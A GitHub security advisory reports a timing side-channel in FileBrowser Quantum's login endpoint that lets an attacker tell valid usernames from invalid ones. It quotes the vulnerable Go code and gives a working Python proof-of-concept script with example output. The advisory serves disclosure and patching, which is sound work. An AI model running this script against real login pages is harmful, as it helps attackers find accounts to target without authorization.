Skip to content

FileBrowser Quantum has Username Enumeration via Authentication Timing Side-Channel

Moderate severity GitHub Reviewed Published Mar 21, 2026 in gtsteffaniak/filebrowser • Updated Mar 24, 2026

Package

gomod github.com/gtsteffaniak/filebrowser/backend (Go)

Affected versions

< 0.0.0-20260317230626-af08800667b8

Patched versions

0.0.0-20260317230626-af08800667b8

Description

Summary

The /api/auth/login authentication endpoint does not execute in constant time. When a non-existent username is supplied, the server returns a 401/403 response almost immediately. When a valid username is provided, the server performs a bcrypt password comparison, causing a measurable delay in the response time.

Details

The vulnerability exists in the Auth function of JSONAuth in auth/json.go (lines 45–52). The function performs a database lookup for the user prior to performing any password validation.

user, err := userStore.Get(username)
	if err != nil {
		return nil, fmt.Errorf("unable to get user from store: %v", err)
	}
	err = users.CheckPwd(password, user.Password)
	if err != nil {
		return nil, err
	}

If the username is not found, the function returns an error immediately. If the username is found, the function calls CheckPwd, which executes the bcrypt hash comparison. Because bcrypt is intentionally computationally expensive, this introduces a measurable delay in the response time.

As a result, an attacker can distinguish valid usernames from invalid ones by measuring the authentication response times.

In testing, responses for valid usernames consistently required approximately 40–50 ms due to the bcrypt comparison, while invalid usernames returned in approximately 1–4 ms.

PoC

The script below automates this attack by calibrating the network latency using non-existent usernames to establish a baseline and then testing a list of target users. Valid usernames are detected when the response time exceeds the baseline.

import requests
import time
import statistics

# Configuration - adjust domain and wordlist as appropriate
TARGET_URL = "http://localhost/api/auth/login"
WORDLIST = ["admin", "root", "user2", "nonexistent_test_user"]

def measure(username):
    start = time.perf_counter()
    requests.post(TARGET_URL, params={"username": username}, headers={"X-Password": "wrong-password"})
    return time.perf_counter() - start

# 1. Baseline Calibration
print("[*] Calibrating...")
baselines = [measure(f"not_a_user_{i}") for i in range(20)]
threshold = statistics.mean(baselines) + (statistics.stdev(baselines) * 5)
print(f"[*] Baseline: {statistics.mean(baselines):.4f}s | Threshold: {threshold:.4f}s")

# 2. Validation Test
for user in WORDLIST:
    t = measure(user)
    status = "VALID" if t > threshold else "invalid"
    print(f"{user:<15} | {t:.4f}s | {status}")

Example output (with admin and user2 configured as valid users in the application):

$ python timeattack.py
[*] Calibrating...
[*] Baseline: 0.0041s | Threshold: 0.0256s
admin           | 0.0505s | VALID
root            | 0.0019s | invalid
user2           | 0.0464s | VALID
nonexistent_test_user | 0.0015s | invalid

Impact

An unauthenticated attacker can enumerate valid usernames by measuring authentication response times.

References

@gtsteffaniak gtsteffaniak published to gtsteffaniak/filebrowser Mar 21, 2026
Published to the GitHub Advisory Database Mar 24, 2026
Reviewed Mar 24, 2026
Last updated Mar 24, 2026

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
Low
Integrity
None
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

EPSS score

Weaknesses

Observable Timing Discrepancy

Two separate operations in a product require different amounts of time to complete, in a way that is observable to an actor and reveals security-relevant information about the state of the product, such as whether a particular operation was successful or not. Learn more on MITRE.

CVE ID

No known CVE

GHSA ID

GHSA-7789-65hx-f26w

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.